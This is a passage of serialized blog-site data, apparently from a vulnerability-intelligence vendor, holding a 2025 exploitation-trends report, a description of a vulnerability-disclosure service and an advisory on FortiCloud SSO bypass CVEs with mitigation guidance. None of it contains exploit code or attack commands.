var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQHqT, html code.shiki .sQHqT{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":19459},[19460,19463],{"id":14865,"depth":220,"text":14866,"children":19461},[19462],{"id":4540,"depth":1266,"text":4541},{"id":201,"depth":220,"text":202},"2026-01-26","Exploring an unauthenticated remote code execution in the SmarterTools SmarterMail server via the ConnectToHub mounting functionality.",{"slug":19467},"smartermail-connecttohub-rce-cve-2026-24423","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",{"title":10344,"description":19465},"blog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[242,1281],"tQEXRHe9QEv0bTc16JE53w9Sfs6wMHKFRf0HfRZswKA",{"id":19474,"title":19475,"articles":19476,"authors":19503,"body":19505,"date":19481,"description":19750,"extension":234,"image":7,"link":7,"meta":19751,"navigation":237,"path":19753,"seo":19754,"series":7,"stem":19755,"subtype":7,"tags":19756,"__hash__":19757},"blog\u002Fblog\u002Fstate-of-exploitation-2026.md","VulnCheck State of Exploitation 2026",[19477,19482,19487,19490,19494,19499],{"title":19478,"source":19479,"link":19480,"date":19481},"Attacks Target Freshly Patched, Critical Fortinet Flaws","BankInfoSecurity","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fattacks-target-freshly-patched-critical-fortinet-flaws-a-30575","2026-01-21",{"title":19483,"source":19484,"link":19485,"date":19486},"Zero-Day Exploits Surge, Nearly 30% of Flaws Attacked Before Disclosure","Infosecurity Magazine","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fzeroday-exploits-surge-vulncheck\u002F","2026-01-22",{"title":19488,"source":19479,"link":19489,"date":19486},"Breach Roundup: DOGE Uploaded Social Security Data to Cloud","https:\u002F\u002Fwww.bankinfosecurity.com\u002Fbreach-roundup-doge-uploaded-social-security-data-to-cloud-a-30586",{"title":19491,"source":3495,"link":19492,"date":19493},"Risky Bulletin: Improperly patched bug exploited again in Fortinet firewalls","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-improperly-patched-bug-exploited-again-in-fortinet-firewalls\u002F","2026-01-23",{"title":19495,"source":19496,"link":19497,"date":19498},"Bond Investors May Be Underpricing Cyber Risk As AI Speeds Up Attacks","Forbes","https:\u002F\u002Fwww.forbes.com\u002Fsites\u002Fdaraabasiita\u002F2026\u002F03\u002F07\u002Fbond-investors-may-be-underpricing-cyber-risk-as-ai-speeds-up-attacks\u002F","2026-03-07",{"title":19500,"source":3486,"link":19501,"date":19502},"CISA mulls new three-day remediation deadline for critical flaws","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4167422\u002Fcisa-mulls-new-three-day-remediation-deadline-for-critical-flaws.html","2026-05-05",[19504],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":19506,"toc":19737},[19507,19513,19522,19525,19528,19533,19583,19595,19599,19603,19606,19610,19615,19622,19626,19631,19634,19637,19641,19646,19649,19652,19656,19661,19664,19668,19673,19681,19685,19690,19693,19697,19702,19705,19709,19712,19716,19719,19726,19728,19730,19732],[18,19508,19509],{},[68,19510],{":width":10862,"alt":19511,"src":19512},"1H-2025 Exploitated Vulnerabilities","\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-exploitation-timeline.png",[18,19514,19515,19516,19521],{},"In 2025, VulnCheck identified 884 Known Exploited Vulnerabilities (KEVs) for which evidence of exploitation was observed for the first time. By using the CVE publication date as a proxy for when defenders often gain awareness of a vulnerability, we can better understand how quickly exploitation follows disclosure and awareness. Our analysis shows that 28.96% of KEVs in 2025 were exploited on or before the day their CVE was published, an increase from the 23.6% observed in our ",[47,19517,19520],{"href":19518,"rel":19519},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2024-exploitation-trends",[51],"2024 trends in exploitation report",", highlighting the continued prevalence of both zero-day[1] and n-day exploitation. This reinforces the urgency for organizations to act quickly on newly disclosed vulnerabilities while continuing to reduce long-standing vulnerability backlogs.",[18,19523,19524],{},"Throughout 2025, exploitation evidence was first reported by over 100 unique organizations, including security researchers, cybersecurity vendors, and software suppliers. Attackers continued to focus on internet-facing and widely deployed technologies, while also opportunistically exploiting a long tail of enterprise software, hardware, and emerging technology such as AI.",[18,19526,19527],{},"These trends demonstrate that exploitation speed remains consistently high year over year, and that defenders must prioritize visibility into exploited vulnerabilities with timely remediation in order to keep pace with attackers.",[18,19529,19530],{},[295,19531,19532],{},"Key takeaways from VulnCheck’s analysis of KEVs in 2025 include:",[22,19534,19535,19541,19547,19553,19559,19566,19573,19576],{},[25,19536,19537,19540],{},[295,19538,19539],{},"884 KEVs"," were identified with first-time exploitation evidence during 2025 and added to VulnCheck KEV.",[25,19542,19543,19546],{},[295,19544,19545],{},"28.96% of KEVs"," showed evidence of exploitation on or before the day the CVE was published, underscoring the persistence of rapid exploitation.",[25,19548,19549,19552],{},[295,19550,19551],{},"118 unique sources"," were first to publicly report exploitation activity, with hundreds more contributing corroborating evidence across the ecosystem.",[25,19554,19555,19558],{},[295,19556,19557],{},"Network edge devices",", including firewalls, VPNs, and proxies, were the most frequently targeted technologies, followed by content management systems and open source software.",[25,19560,19561,19562,19565],{},"Exploitation activity spanned ",[295,19563,19564],{},"hundreds of vendors and products",", reflecting a broader coverage of enterprise technologies than is represented in public KEV catalogs alone.",[25,19567,19568,19569,19572],{},"VulnCheck identified exploitation evidence for KEVs ",[295,19570,19571],{},"significantly earlier than CISA KEV in the majority of cases",", often by days, months, or even years.",[25,19574,19575],{},"Ransomware attribution continued to lag behind initial exploitation disclosure, suggesting that attribution for vulnerabilities exploited in 2025 will continue to grow as additional research is published.",[25,19577,19578,19579,19582],{},"Time-to-exploitation patterns in 2025 remained ",[295,19580,19581],{},"highly consistent with 2024",", indicating stable and sustained attacker behavior.",[18,19584,19585,19586,19589,19590,59],{},"This research was completed using ",[47,19587,1233],{"href":1231,"rel":19588},[51]," which is available as a free community service. During 2025 we expanded VulnCheck KEV to now include ",[47,19591,19594],{"href":19592,"rel":19593},"https:\u002F\u002Fdocs.vulncheck.com\u002Falerts",[51],"E-mail and Slack alerting",[61,19596,19598],{"id":19597},"_2025-kev-exploitation-timeline","2025 KEV Exploitation Timeline",[18,19600,19601],{},[68,19602],{":width":10862,"alt":19511,"src":19512},[18,19604,19605],{},"During 2025, VulnCheck identified exploitation activity for 884 Known Exploited Vulnerabilities (KEVs) that had no evidence of exploitation prior to 2025. To better understand how quickly vulnerabilities are exploited, we use the CVE publication date as a reference point for when defenders typically first gain visibility into a vulnerability. Our analysis shows that 28.96% of the KEVs identified in 2025 were exploited on or before the day their CVE was published, underscoring the speed at which threat actors operate and often exploit vulnerabilities, often before public disclosure or CVE issuance occurs. This highlights the need for vulnerabilities early in their lifecycle are addressed when exploitation risk is high, while continuing to remediate older vulnerabilities that persist.",[61,19607,19609],{"id":19608},"first-reporter-of-exploitation-in-2025","First Reporter of Exploitation in 2025",[18,19611,19612],{},[68,19613],{":width":10862,"alt":19511,"src":19614},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-exploitation-source.png",[18,19616,19617,19618,59],{},"By analyzing source-level evidence of exploitation, we identified which organizations publicly disclosed exploitation evidence first. In 2025, we observed 118 unique sources that were the first reporters of exploitation activity, with hundreds of additional sources contributing corroborating evidence. Transparency in exploitation disclosure is critical, as it enables consumers to better understand who first reported exploitation and to assess the level of trust they place in each source. Shadowserver remained the leading source for first-to-report exploitation evidence. The most notable increases in sources that were first to report KEVs included CrowdSec, which was onboarded as a new source and scaled significantly in 2025, and VulnCheck, following the launch of ",[47,19619,19621],{"href":281,"rel":19620},[51],"VulnCheck Canary Intelligence",[61,19623,19625],{"id":19624},"top-targeted-technologies","Top Targeted Technologies",[18,19627,19628],{},[68,19629],{":width":10862,"alt":19511,"src":19630},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Ftop-targeted-technologies-2025.png",[18,19632,19633],{},"Looking at the top technologies being targeted, network edge devices such as firewalls, VPNs, and proxies top the list. This is not surprising, as they are internet-facing devices that often serve as a jumping-off point into an enterprise environment or home network. Content management systems, largely dominated by the WordPress ecosystem, are also frequent targets because they are commonly exposed to the internet. Open source software ranked third in 2025, followed by server software and operating systems such as Microsoft Windows, Linux, Apple, and Android.",[18,19635,19636],{},"However, exploitation spans a broad range of enterprise technologies and extends beyond these categories to include hardware devices, most often camera systems, as well as file sharing platforms, developer tools, device management systems, backup solutions, security tools, desktop applications, AI systems, ICS and OT environments, email platforms, virtualization technologies, identity systems, browsers, mobile applications, cloud services, and more. Threat actors are opportunistic, leveraging both older, well-known vulnerabilities and newly disclosed flaws to access systems and establish footholds across the enterprise.",[61,19638,19640],{"id":19639},"top-targeted-technologies-time-from-cve-to-exploitation-evidence","Top Targeted Technologies - Time from CVE to Exploitation Evidence",[18,19642,19643],{},[68,19644],{":width":10862,"alt":19511,"src":19645},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2025-top-ten-timeline.png",[18,19647,19648],{},"Breaking out the top ten targeted technologies and examining exploitation timelines relative to CVE issuance provides additional insight into the relationship between exploitation and disclosure.",[18,19650,19651],{},"Operating systems top the chart, likely because vendors such as Microsoft, Apple, and Android frequently disclose evidence of exploitation alongside their security advisories. This year, we spent considerable time issuing CVEs targeting camera systems, which fall under the hardware category. This likely reflects the relative immaturity of vulnerability disclosure and issuance practices among hardware manufacturers. While each category could warrant its own dedicated research project, this analysis provides defenders with a clearer sense of how quickly they need to prioritize patching for each technology.",[61,19653,19655],{"id":19654},"how-did-vulncheck-kev-compare-with-cisa-kev-in-2025","How Did VulnCheck KEV compare with CISA KEV in 2025?",[18,19657,19658],{},[68,19659],{":width":10862,"alt":19511,"src":19660},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fvulncheck-cisa-kev.png",[18,19662,19663],{},"During the year, VulnCheck identified 884 unique KEVs across 518 vendors and 672 products, while CISA added 245 KEVs across 99 vendors and 146 products, most of which are high impact and pervasive across the federal landscape. One of the biggest differences is the volume of vendors and projects covered. Additionally, VulnCheck added evidence to its KEVs more than 85 percent of the time, often predating CISA by days, months, or even years.",[61,19665,19667],{"id":19666},"exploitation-of-real-vulnerable-hosts-not-on-cisa-kev","Exploitation of Real Vulnerable Hosts, not on CISA KEV",[18,19669,19670],{},[68,19671],{":width":10862,"alt":19511,"src":19672},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fcanaries-not-on-cisa-kev.png",[18,19674,19675,19676,19680],{},"In October 2025, we added exploitation indicators to VulnCheck KEV sourced from ",[47,19677,19679],{"href":281,"rel":19678},[51],"VulnCheck's Canary Intelligence"," service. When exploitation of a vulnerability is detected against a real vulnerable host that we have deployed, an indicator is added to VulnCheck KEV. This provides valuable insight into technologies where exploitation has been observed on real-world systems, but the vulnerabilities are not listed in CISA KEV.",[61,19682,19684],{"id":19683},"ransomware-attribution-over-time","Ransomware Attribution Over time",[18,19686,19687],{},[68,19688],{":width":10862,"alt":19511,"src":19689},"\u002Fblog\u002Fstate-of-exploitation-2026\u002Fkev-ransomware-comparison.png",[18,19691,19692],{},"The spike observed in 2021 and 2022 is likely a direct result of the initial release of CISA’s Known Exploited Vulnerabilities (KEV) catalog, which included early additions and associated ransomware attribution. We are now likely seeing stabilization in the number of vulnerabilities used in ransomware campaigns; however, because ransomware attribution is often delayed relative to initial exploitation disclosures, we expect attribution for vulnerabilities known to be exploited in 2025 to continue increasing as additional research is published.",[61,19694,19696],{"id":19695},"how-does-the-2025-exploitation-timeline-compare-with-2024","How Does the 2025 Exploitation Timeline Compare with 2024?",[18,19698,19699],{},[68,19700],{":width":10862,"alt":19511,"src":19701},"\u002Fblog\u002Fstate-of-exploitation-2026\u002F2024-2025-timeline.png",[18,19703,19704],{},"Time to exploitation remained highly consistent between 2024 and 2025, with only minor deviations, indicating consistent exploitation activity in known exploited vulnerabilities across both years.",[61,19706,19708],{"id":19707},"summary-of-vulncheck-state-of-exploitation-2026","Summary of VulnCheck State of Exploitation - 2026",[18,19710,19711],{},"2025 reinforces the reality that exploitation speed remains a defining challenge for defenders. With nearly 900 KEVs first observed as exploited during the year, sustained prevalence of zero-day[1] and n-day exploitation activity, and continued targeting of internet-facing and widely deployed enterprise technologies, organizations face little margin for delayed response. While time-to-exploitation patterns remained consistent with 2024, the scale and breadth of affected vendors, products, and technologies continue to expand. Maintaining strong vulnerability management practices, prioritizing trusted exploitation intelligence, and monitoring beyond the CISA KEV catalog remain critical to reducing exposure and staying ahead of adversaries.",[61,19713,19715],{"id":19714},"considerations-for-this-report","Considerations For This Report",[18,19717,19718],{},"[1] Not all KEVs being exploited on the same day of CVE issuance are Zero Days.",[18,19720,19721,19722,59],{},"[2] The CVE for 81 of the KEVs that were identified as being exploited in the wild during 2025 were published by VulnCheck through the VulnCheck research team, partnership with ShadowServer, and from our ",[47,19723,19725],{"href":2999,"rel":19724},[51],"report a vulnerability service",[61,19727,202],{"id":201},[18,19729,205],{},[18,19731,208],{},[18,19733,211,19734,217],{},[47,19735,216],{"href":214,"rel":19736},[51],{"title":219,"searchDepth":220,"depth":220,"links":19738},[19739,19740,19741,19742,19743,19744,19745,19746,19747,19748,19749],{"id":19597,"depth":220,"text":19598},{"id":19608,"depth":220,"text":19609},{"id":19624,"depth":220,"text":19625},{"id":19639,"depth":220,"text":19640},{"id":19654,"depth":220,"text":19655},{"id":19666,"depth":220,"text":19667},{"id":19683,"depth":220,"text":19684},{"id":19695,"depth":220,"text":19696},{"id":19707,"depth":220,"text":19708},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"Key Trends and Findings from 2025’s Known Exploited Vulnerabilities",{"slug":19752},"state-of-exploitation-2026","\u002Fblog\u002Fstate-of-exploitation-2026",{"title":19475,"description":19750},"blog\u002Fstate-of-exploitation-2026",[1280,1279],"CFNgriapfPqLnvoX4s8LAzQUJhJ2YpIQhjhI0mQU7-I",{"id":19759,"title":19760,"articles":7,"authors":19761,"body":19768,"date":19987,"description":19988,"extension":234,"image":7,"link":7,"meta":19989,"navigation":237,"path":19991,"seo":19992,"series":7,"stem":19993,"subtype":7,"tags":19994,"__hash__":19995},"blog\u002Fblog\u002Freport-a-vulnerability.md","How to Report a Security Vulnerability to VulnCheck",[19762,19767],{"name":19763,"avatar":19764,"link":19765,"linkName":19766},"Wade Sparks","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U090MLLSBBL-d5b69f2a49e7-192","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fwadesparksvt\u002F","in\u002Fwadesparksvt\u002F",{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":19769,"toc":19975},[19770,19773,19776,19779,19793,19796,19800,19803,19807,19810,19822,19826,19829,19832,19858,19861,19867,19871,19874,19882,19886,19889,19893,19896,19900,19903,19907,19910,19944,19948,19956,19958],[18,19771,19772],{},"Start reporting your vulnerabilities through an organization equipped to handle Coordinated Vulnerability Disclosure (CVD) AND CVE assignment on your behalf. VulnCheck is here to service you, and we invite you to give it a whirl.",[18,19774,19775],{},"Security researchers often encounter obstacles when attempting to disclose vulnerabilities independently, whether discovered firsthand or observed in the wild. Each software supplier has its own disclosure process, which can introduce unnecessary friction and, over time, lead to frustration or abandonment of coordinated disclosure altogether.",[18,19777,19778],{},"Common challenges we observe include:",[22,19780,19781,19784,19787,19790],{},[25,19782,19783],{},"Limited or inconsistent supplier security resources",[25,19785,19786],{},"Lack of responsiveness or a clear security contact",[25,19788,19789],{},"Lengthy validation and remediation workflows",[25,19791,19792],{},"Legal or policy concerns imposed on researchers",[18,19794,19795],{},"To address these issues, VulnCheck offers a free vulnerability reporting service designed to reduce the burden of disclosure and support researchers.",[61,19797,19799],{"id":19798},"why-report-a-vulnerability-to-vulncheck","Why Report a Vulnerability to VulnCheck?",[18,19801,19802],{},"VulnCheck works directly with researchers to coordinate disclosure and manage communications with affected suppliers. This minimizes the time and effort you spend navigating disclosure processes while ensuring vulnerabilities are handled responsibly and consistently. All of this is done while ensuring proper credit is given to the researcher.",[61,19804,19806],{"id":19805},"how-does-vulnchecks-report-a-vulnerability-service-work","How Does VulnCheck’s Report a Vulnerability Service Work?",[18,19808,19809],{},"Simply submit the technical details of your vulnerability to VulnCheck. We do not require a specific format and aim to keep initial questions to a minimum. That said, providing thorough technical detail helps us validate the issue and proceed efficiently.",[18,19811,19812,19813,19817,19818],{},"Once submitted, VulnCheck will handle the disclosure process and keep you informed at every stage.\nYou may submit a report via:\n",[47,19814,19816],{"href":2999,"rel":19815},[51],"Web portal","\nEmail: ",[47,19819,19821],{"href":19820},"mailto:disclosure@vulncheck.com","disclosure@vulncheck.com",[61,19823,19825],{"id":19824},"what-information-is-needed-when-reporting-a-vulnerability","What Information Is Needed When Reporting a Vulnerability?",[18,19827,19828],{},"Submissions can range from a public reference to an unidentified vulnerability to a full technical report with reproduction steps and proof of concept. At a minimum, we ask for enough information to either populate a CVE record or initiate coordination with the supplier.",[18,19830,19831],{},"When using the web form, you will be asked to provide:",[22,19833,19834,19837,19840,19843,19846,19849,19852,19855],{},[25,19835,19836],{},"Vendor name",[25,19838,19839],{},"Product name",[25,19841,19842],{},"Affected and tested version(s)",[25,19844,19845],{},"Vulnerability details: a clear description of the issue, its impact, and exploitation method, including reproduction steps and a proof of concept if available",[25,19847,19848],{},"Whether you would like VulnCheck to coordinate disclosure on your behalf",[25,19850,19851],{},"Whether you previously requested CVEs from MITRE without response",[25,19853,19854],{},"Whether the vulnerability has already been publicly disclosed (with references, if applicable)",[25,19856,19857],{},"Whether you plan to publish your findings on or after the coordinated disclosure date",[18,19859,19860],{},"Here is an example of a comprehensive CVD submission presented in a format that enables us to go quickly from intake to vendor outreach:",[18,19862,19863],{},[68,19864],{"alt":19865,"src":19866},"Report a Vulnerability Example","\u002Fblog\u002Freport-a-vulnerability\u002Freport-example.png",[61,19868,19870],{"id":19869},"what-timeline-should-i-expect-from-vulncheck","What Timeline Should I Expect From VulnCheck?",[18,19872,19873],{},"You should expect an analyst to engage with you within 1 business day.",[22,19875,19876,19879],{},[25,19877,19878],{},"CVE assignments for publicly disclosed issues or already-coordinated cases often occur within hours.",[25,19880,19881],{},"For coordinated disclosures, VulnCheck’s average time from initial report to public disclosure is approximately 48 days, well within our 120-day disclosure policy.",[61,19883,19885],{"id":19884},"will-vulncheck-assign-a-cve","Will VulnCheck Assign a CVE?",[18,19887,19888],{},"Yes. After appropriate coordination, VulnCheck will issue a CVE directly or work with the most appropriate CVE Numbering Authority, depending on scope and ownership.",[61,19890,19892],{"id":19891},"what-if-my-vulnerability-is-already-public-and-i-only-need-a-cve-id","What If My Vulnerability Is Already Public and I Only Need a CVE ID?",[18,19894,19895],{},"VulnCheck is a CVE Numbering Authority and can issue a CVE ID directly or coordinate assignment as needed.",[61,19897,19899],{"id":19898},"does-vulncheck-offer-a-bounty-payout","Does VulnCheck Offer a Bounty Payout?",[18,19901,19902],{},"No. VulnCheck does not provide financial incentives for vulnerability submissions.",[61,19904,19906],{"id":19905},"are-there-instances-where-vulncheck-will-not-perform-disclosure","Are There Instances Where VulnCheck Will Not Perform Disclosure?",[18,19908,19909],{},"There are limited circumstances in which VulnCheck will decline to coordinate disclosure:",[22,19911,19912,19920,19928,19936],{},[25,19913,19914,19915],{},"Not CVE-eligible\n",[22,19916,19917],{},[25,19918,19919],{},"We can help determine eligibility, but we do not coordinate disclosure for issues that do not qualify for CVE assignment.",[25,19921,19922,19923],{},"Unable to reproduce the issue\n",[22,19924,19925],{},[25,19926,19927],{},"If neither VulnCheck nor the supplier can validate the vulnerability after reasonable attempts, the case may be closed.",[25,19929,19930,19931],{},"Embargo violations\n",[22,19932,19933],{},[25,19934,19935],{},"If a researcher breaches an agreed embargo, VulnCheck may decline future coordination.",[25,19937,19938,19939],{},"Unethical or unauthorized discovery\n",[22,19940,19941],{},[25,19942,19943],{},"Vulnerabilities identified through testing on production systems without authorization will not be coordinated.",[61,19945,19947],{"id":19946},"is-vulnchecks-report-a-vulnerability-service-legally-binding","Is VulnCheck’s ‘Report a Vulnerability’ Service Legally Binding?",[18,19949,19950,19951,19955],{},"No - this service does not have any legal authority. We adhere to our ",[47,19952,19954],{"href":14795,"rel":19953},[51],"Vulnerability Disclosure Policy",". Participants are expected to respect mutual embargoes during coordinated disclosure. Researchers may choose to break an embargo at any time; however, VulnCheck reserves the right to refuse future service in such cases.",[61,19957,202],{"id":201},[18,19959,1228,19960,1234,19963,1240,19966,1246,19969,1255,19972,1260],{},[47,19961,1233],{"href":10806,"rel":19962},[51],[47,19964,1239],{"href":1237,"rel":19965},[51],[47,19967,1245],{"href":1243,"rel":19968},[51],[47,19970,1251],{"href":1249,"rel":19971},[51],[47,19973,216],{"href":1258,"rel":19974},[51],{"title":219,"searchDepth":220,"depth":220,"links":19976},[19977,19978,19979,19980,19981,19982,19983,19984,19985,19986],{"id":19798,"depth":220,"text":19799},{"id":19805,"depth":220,"text":19806},{"id":19824,"depth":220,"text":19825},{"id":19869,"depth":220,"text":19870},{"id":19884,"depth":220,"text":19885},{"id":19891,"depth":220,"text":19892},{"id":19898,"depth":220,"text":19899},{"id":19905,"depth":220,"text":19906},{"id":19946,"depth":220,"text":19947},{"id":201,"depth":220,"text":202},"2026-01-09","VulnCheck offers a free vulnerability reporting service designed to reduce the burden of disclosure and support researchers.",{"slug":19990},"report-a-vulnerability","\u002Fblog\u002Freport-a-vulnerability",{"title":19760,"description":19988},"blog\u002Freport-a-vulnerability",[242],"KaZGoUusChnNsI-flU7vQKLF2Oen7HFUi8dbdGSVhaU",{"id":19997,"title":19998,"articles":7,"authors":19999,"body":20002,"date":20166,"description":20167,"extension":234,"image":7,"link":7,"meta":20168,"navigation":237,"path":20170,"seo":20171,"series":7,"stem":20172,"subtype":7,"tags":20173,"__hash__":20174},"blog\u002Fblog\u002Fforticloud-sso-login-bypass.md","FortiCloud SSO Login Bypass Vulnerabilities Exploited in the Wild",[20000],{"name":256,"avatar":257,"link":258,"linkName":20001},"linkedin.com\u002Fin\u002Fccondon\u002F",{"type":15,"value":20003,"toc":20159},[20004,20026,20028,20044,20055,20058,20062,20080,20083,20096,20099,20108,20112,20119,20121,20142],[22,20005,20006,20020,20023],{},[25,20007,20008,20009,1246,20014,20019],{},"Fortinet disclosed two critical vulnerabilities (",[47,20010,20013],{"href":20011,"rel":20012},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59718",[51],"CVE-2025-59718",[47,20015,20018],{"href":20016,"rel":20017},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-59719",[51],"CVE-2025-59719",") across multiple products on December 9, 2025.",[25,20021,20022],{},"The vulnerabilities allow unauthenticated adversaries bypass FortiCloud SSO login authentication. Multiple security firms indicate they’ve observed exploitation in the wild.",[25,20024,20025],{},"VulnCheck’s research team has analyzed known public PoCs and determined they are fake or incomplete; defenders should avoid writing or alerting on detections for fake or non-functional PoCs that would not succeed in real-world attacks.",[61,20027,11273],{"id":11272},[18,20029,20030,20031,20036,20037,982,20040,20043],{},"On December 9, 2025, Fortinet published a critical ",[47,20032,20035],{"href":20033,"rel":20034},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-25-647",[51],"security advisory"," on two CVEs affecting FortiOS, FortiProxy, FortiSwitchManager, and FortiWeb. ",[47,20038,20013],{"href":20011,"rel":20039},[51],[47,20041,20018],{"href":20016,"rel":20042},[51]," have identical descriptions and affected products; the vulnerabilities arise from an improper verification of cryptographic signature issue that allows unauthenticated attackers to bypass FortiCloud SSO login authentication “via a crafted SAML message,” if FortiCloud SSO login is enabled on the device.",[18,20045,20046,20047,20051,20052,20054],{},"Per the ",[47,20048,20050],{"href":20033,"rel":20049},[51],"vendor advisory",": ",[1823,20053],{},"\n> Please note that the FortiCloud SSO login feature is not enabled in default factory settings. However, when an administrator registers the device to FortiCare from the device's GUI, unless the administrator disables the toggle switch \"Allow administrative login using FortiCloud SSO\" in the registration page, FortiCloud SSO login is enabled upon registration.",[18,20056,20057],{},"Both vulnerabilities were discovered internally at Fortinet and were not (to our current knowledge) exploited in the wild at time of disclosure.",[61,20059,20061],{"id":20060},"reports-of-exploitation-in-the-wild","Reports of exploitation in the wild",[18,20063,20064,20065,982,20070,20075,20076,20079],{},"Security firms ",[47,20066,20069],{"href":20067,"rel":20068},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Farctic-wolf-observes-malicious-sso-logins-following-disclosure-cve-2025-59718-cve-2025-59719\u002F",[51],"Arctic Wolf",[47,20071,20074],{"href":20072,"rel":20073},"https:\u002F\u002Fwww.linkedin.com\u002Fposts\u002Fdrayagha_for-the-latest-fortigate-cves-cve-2025-59718-activity-7407214356226281473-K0vf",[51],"Huntress"," have both indicated they’ve observed malicious activity related to these issues; Arctic Wolf said they began seeing “malicious SSO logins on Fortigate appliances” on December 12, three days after the CVEs were disclosed. Huntress also noted specific post-exploitation behavior, namely that adversaries are dumping exploited device configurations after bypassing SSO authentication. Both vulnerabilities were added to ",[47,20077,1233],{"href":1231,"rel":20078},[51]," as of December 15, based on the Arctic Wolf report. CISA added CVE-2025-59718 (but not the second CVE) to their KEV on December 16.",[61,20081,20082],{"id":11509},"VulnCheck research observations",[18,20084,20085,20086,10515,20090,20095],{},"Based on our team’s analysis, the two ",[47,20087,15019],{"href":20088,"rel":20089},"https:\u002F\u002Fgithub.com\u002FAshwesker\u002FBlackash-CVE-2025-59718",[51],[47,20091,20094],{"href":20092,"rel":20093},"https:\u002F\u002Fgithub.com\u002Fexfil0\u002FCVE-2025-59718-PoC",[51],"PoCs"," for CVE-2025-59718 (as of December 18) are fake or otherwise incomplete. Neither was functional in testing across a range of affected products and configurations. As of 8 AM EST on December 18, we’re not aware of any valid public PoCs for either vulnerability.",[18,20097,20098],{},"We’ve observed a relatively high degree of chatter across social media platforms and industry groups about exploitation of one or both CVEs. At least a subset of these claims, however, appears to be based on detections of non-functional PoCs, meaning that those attacks would not succeed in a real-world environment. Threat research and security teams should avoid relying on detections written against known-fake or otherwise invalid PoCs.",[18,20100,20101,20102,20107],{},"Our team also developed targeted ASM queries for Initial Access Intelligence customers that look for the FortiCloud SSO login button on the system's login page — a UI button that's present only if the ",[47,20103,20106],{"href":20104,"rel":20105},"https:\u002F\u002Fdocs.fortinet.com\u002Fdocument\u002Ffortigate\u002F7.6.3\u002Fadministration-guide\u002F135321\u002Fforticloud-sso",[51],"FortiCloud SSO feature"," is enabled as a login option. In our testing, the button disappeared once the feature was disabled. Interestingly, exposure results using this method are extremely low (under 100 at most), and in Shodan's case absent altogether.",[61,20109,20111],{"id":20110},"mitigation-guidance","Mitigation guidance",[18,20113,20114,20115,20118],{},"A full list of affected products and versions is available in the ",[47,20116,20050],{"href":20033,"rel":20117},[51],". Organizations should disable the FortiCloud login feature until they are able to update to a fixed version and look for unexpected logins, particularly for the admin user. Updating to a fixed version, of course, does not eradicate threat actors from compromised 